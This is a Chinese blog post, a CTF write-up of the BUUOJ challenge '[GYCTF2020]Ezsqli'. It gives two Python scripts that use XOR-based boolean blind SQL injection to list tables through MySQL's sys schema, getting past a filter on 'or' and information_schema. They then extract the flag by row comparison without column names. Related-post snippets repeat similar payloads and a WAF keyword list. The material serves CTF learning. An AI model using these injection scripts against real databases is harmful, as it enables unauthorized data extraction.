[GYCTF2020]Ezsqli

最新推荐文章于 2024-03-22 07:00:00 发布
最新推荐文章于 2024-03-22 07:00:00 发布
阅读量304 收藏
点赞数 2
分类专栏: # buuoj 文章标签: mysql web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51652864/article/details/119786333
版权

[GYCTF2020]Ezsqli
这道题还挺有趣的,用到了无列名注入以及比较的方式,如果有些不清楚的,可以先看看我的这两篇文章(写得不是很好,见谅),这样应该对这两种方式都能有些了解
http://blog.o3ev.cn/index.php/archives/29/
http://blog.o3ev.cn/index.php/archives/41/

好像用手机访问挺慢的,电脑访问应该就流畅了

回到题目上来
在这里插入图片描述
对注入框进行fuzz,过滤掉了or,也就是说不能用information_schema的库
在有了上面两篇文章的基础上,我就直接给脚本了

import requests
url='http://5c532294-0b1e-43d9-ae85-c8f7f23451d9.node4.buuoj.cn:81/index.php'
f=''
for i in range(1,200):
    min=32
    max=127
    mid=(min+max)//2
    while min<max:
        #payload="1^(ascii(substr((select database()),{},1))>{})^1".format(str(i),str(mid)) #give_grandpa_pa_pa_pa
        payload = "1^(ascii(substr((select group_concat(table_name) from sys.x$schema_table_statistics_with_buffer where table_schema=database()),{},1))>{})^1".format(str(i), str(mid))#f1ag_1s_h3r3_hhhhh,users233333333333333
        data={
            "id":payload
        }
        s=requests.post(url=url,data=data)
        if "Nu1L" in s.text:
            min=mid+1
        else:
            max=mid
        mid=(min+max)//2
    f+=chr(mid)
    print(f)

在这里插入图片描述
成功跑出表名,剩下的就是用mysql8特性去比较就完事了,这是跑flag的脚本:

import requests
url='http://5c532294-0b1e-43d9-ae85-c8f7f23451d9.node4.buuoj.cn:81/index.php'
f=''
for i in range(0,200):
    min=32
    max=127
    mid=(min+max)//2
    while min<max:
        payload = "1^((1,'{}')>(select * from f1ag_1s_h3r3_hhhhh))"
        dd=f+chr(mid)
        ff=payload.format(dd)
        data={
            "id":ff
        }
        s=requests.post(url=url,data=data)
        if "Nu1L" in s.text:
            min=mid+1
        else:
            max=mid
        mid=(min+max)//2
    f+=chr(mid-1)
    print(f.lower())

在这里插入图片描述
成功跑出flag

o3Ev
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[GYCTF2020] web题-Ezsqli
BROTHERYY的博客
12-30 383
这题一直出问题,用脚本跑到一半都会崩。 后面换了一个,能够跑出来。 详细情况可以看看Ying师傅的blog https://www.gem-love.com/ctf/1782.html 我把跑出来的代码贴出来可以参考下 # coding:utf-8 import requests import time url = 'http://2aa83373-6644-4c2f-904a-9f15560d4f1c.node3.buuoj.cn/' def str_hex(s): #十六进制转换 fl ==>
ezsqli
qq_40710190的博客
09-28 425
ezsqli 根据题目的提示这是一道关于SQL注入的题,这几天恶补了一波SQL注入,记录一下解题过程 1.前景知识 MySQL数据库注入基础 报错基于GET的注入GET-Error based PHP绕过and和or过滤 先看下来吧,如果有不会的在回头来前景知识这里找好了 2.正题进入 二话不说,F12查看源码 <script type="text/javascript"> name = $_POST['name']; $password = $_POST['pw'];
[2020网络安全管理职业技能竞赛全国选拔赛]ezsqli
末初的CSDN博客
11-07 1819
hint <?php //a "part" of the source code here function sqlWaf($s) { $filter = '/xml|extractvalue|regexp|copy|read|file|select|between|from|where|create|grand|dir|insert|link|substr|mid|server|drop|=|>|<|;|"|\^|\||\ |\'/i'; if (preg_matc..
xctf攻防世界easysql wp
sash1mi
02-20 1836
xctf攻防世界easysql wp 考察知识点: SQL注入 二次注入 python脚本 访问题目地址 有注册和登录两个功能 经测试发现该题目存在二次注入 https://www.jianshu.com/p/3fe7904683ac username:'k3vin"/ password:k3vin email:k3vin 注册成功后有一个修改密码的页面 修改密码,报如下错误 猜测并构造payload: 1"||extractvalue(1,concat(0x7e,(select(database
[GYCTF2020]Ezsqli(无列名注入)
weixin_43940853的博客
05-16 5104
[GYCTF2020]Ezsqli 过滤了好多东西,包括用来查询的information关键词,本上就是考虑盲注了 当||后面条件为真时返回Nu1L,为假时返回V&N,这就是判断盲注语句是否成立的关键 接下来就可以写脚本判断表名了 import requests url = 'http://bfd71058-3cf0-4e87-8731-8935a651f051.node3.buuoj.cn/' payload = '2||ascii(substr((select group_concat
PHP登录环节防止sql注入的方法浅析
10-25
主要介绍了PHP登录环节防止sql注入的方法,需要的朋友可以参考下
[GYCTF2020]Ezsqli(Mysql逐位比较)
D.MIND 的博客
04-23 503
前言 用到异或注入、bool盲注,这题我感觉最重要的还是理解mysql是如何比较字符串的 与利用 逐位比较 来配合盲注 文章目录前言`sys.schema_table_statistics_with_buffer`查表mysql字符串 逐位比较大小总结 这题关键过滤了union 、if 、sleep与 information,当然常规的or 和 and也是过滤了的 一开始看到 if 和sleep被过滤了就没有往延时注入、union注入上想 异或注入就成了我的首选! 测试一下 id=1 ^ 1# Error
青少年CTF-ezsql-题目解析
zxsctf的博客
01-07 620
username处加反斜杠转义单引号,造成逃逸,后面可控,成为注入点,payload:or password regexp binary {}#通过探测发现过滤了select、union、'、"、、=、like、and等。利用regexp进行匹配猜测数据,还需要用binary关键字来区分大小写。进入提示,发现要我们登陆,点击确定后跳转到了login.php目录。题目的考点应该是本题考点为MySQL regexp盲注了。题目来源:克拉玛依市第一届网络安全技能大赛。
[GYCTF2020]Ezsqli ---不会编程的崽
最新发布
不会编程的崽的博客
03-22 452
既然知道是sql注入就不墨迹了。初步判断盲注,判断盲注的方发不用说了吧,然后fuzz一下,information被过滤了。再次可以判断为盲注与无列名注入。因为无列名注入无法获得列名,不能使用普通盲注,而且这里也无法使用union select。来尝试一下新的方法吧。管他有列名还是无列名,先找到表。由于information被过滤了。这是比较形象的解释。所以构造payload。这题不难,难的是不知道有哪些表可以利用,不知道这种比较方法。又是sql新题型哦。最后在转化为小写就可以提交了。脚本写的不好,请见谅。
[GYCTF2020]Ezsqli 绕过or information_schema 无列名注入
m0_64180167的博客
10-09 451
说好的ez....我们开始吧首先就直接进行抓包 看回显然后开始正常的测试报错了 这里的。
[GYCTF2020]Ezsqli -wp
freerats的博客
08-15 353
打开容器后可以看到一个提交框 尝试一下发现可以进行bool盲注0^1 0^(ascii(substr((select database()),1,1))>0) 可以比较顺利的查到库名 give_grandpa_pa_pa_pa fuzz后可以发现过滤了or,所以information_schema无法使用,但可以使用sys.schema_table_statistics_with_buffer代替 id=0^(ascii(substr((select group_concat(table_nam.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

o3Ev

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值